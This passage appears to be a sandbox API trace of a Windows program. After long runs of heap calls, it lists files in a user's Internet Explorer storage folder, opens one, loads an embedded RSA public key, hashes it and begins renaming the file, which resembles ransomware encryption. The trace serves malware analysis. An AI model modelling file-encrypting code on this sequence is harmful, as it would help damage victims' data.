RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.210] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.210] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.214] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.214] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.214] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.214] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.214] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.214] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\") returned="3O75JDME\\" [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311efe8 [0099.214] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f1a0 [0099.214] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311efe8 | out: hHeap=0x680000) returned 1 [0099.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0099.214] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df338 [0099.214] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f1a0 | out: hHeap=0x680000) returned 1 [0099.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0099.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0099.214] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df338 | out: hHeap=0x680000) returned 1 [0099.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0099.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb988 [0099.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0099.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0099.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc268 [0099.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0099.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc268 | out: hHeap=0x680000) returned 1 [0099.215] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.215] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.215] PathFindFileNameW (pszPath="") returned="" [0099.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.215] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0099.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.216] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.216] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 1 [0099.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc0) returned 0x99e6428 [0099.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11e) returned 0x31b6350 [0099.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6428 | out: hHeap=0x680000) returned 1 [0099.216] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned=".xml" [0099.216] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0099.217] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=13) returned 1 [0099.217] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0099.220] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.220] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xd, lpOverlapped=0x0) returned 1 [0099.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.221] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0099.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.221] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df338) returned 1 [0099.222] CryptCreateHash (in: hProv=0x6df338, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0099.222] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.222] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0099.223] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0099.223] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0099.223] GetLastError () returned 0x0 [0099.223] CryptDestroyHash (hHash=0x31c7580) returned 1 [0099.223] CryptReleaseContext (hProv=0x6df338, dwFlags=0x0) returned 1 [0099.223] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.223] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0099.223] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0099.223] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.223] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0099.223] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.223] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.223] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.224] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.224] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0099.224] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet 